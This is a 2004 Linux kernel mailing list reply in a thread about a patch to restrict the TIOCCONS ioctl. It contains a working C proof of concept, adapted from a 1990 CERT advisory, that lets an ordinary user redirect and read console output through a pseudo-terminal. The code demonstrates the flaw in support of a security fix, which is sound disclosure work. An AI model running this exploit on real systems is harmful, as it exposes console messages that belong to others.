Re: [Patch] TIOCCONS security

[Kees Cook]

On Wed, 25 Aug 2004 18:18:37 +0200, Olaf Dabrunz wrote:
> The bottom line is, that I do not see why normal users should be able to
> use TIOCCONS. Hijacking console output is a security problem, which has
> been found quite some time ago on SunOS as well
> (http://www.cert.org/advisories/CA-1990-12.html).

Confirmed.  If you run the following code as a regular user, you can see
messages.  (BTW: don't do a "tail -f /dev/console".  For reasons I don't
understand, it writes endless CRs to which ever tty you happen to have
open):

# echo "ew. information leak." >> /dev/console


/* lifted from CA-1990-12 exploit code */
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <termio.h>
#include <errno.h>

main()
{
  int m,s;
  char buf[1024];
  char *l;
  size_t bytes;

  /* probably unused tty */
  static char lastpty[]="/dev/ptyvf";

  if((m=open(lastpty,O_RDWR)) == -1) {
    perror(lastpty);
    exit(1);
  }

  lastpty[5]='t';
  if((s=open(lastpty,O_RDWR)) == -1) {
    perror(lastpty);
    exit(1);
  }

  if(ioctl(s,TIOCCONS) == -1) {
    perror("TIOCONS");
    exit(1);
  }

  do {
    if ((bytes=read(m,buf,sizeof buf))<0 && errno!=EINTR)
          return 1;
    write(fileno(stdout),buf,bytes);
  } while (1);

  return 0;
}

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/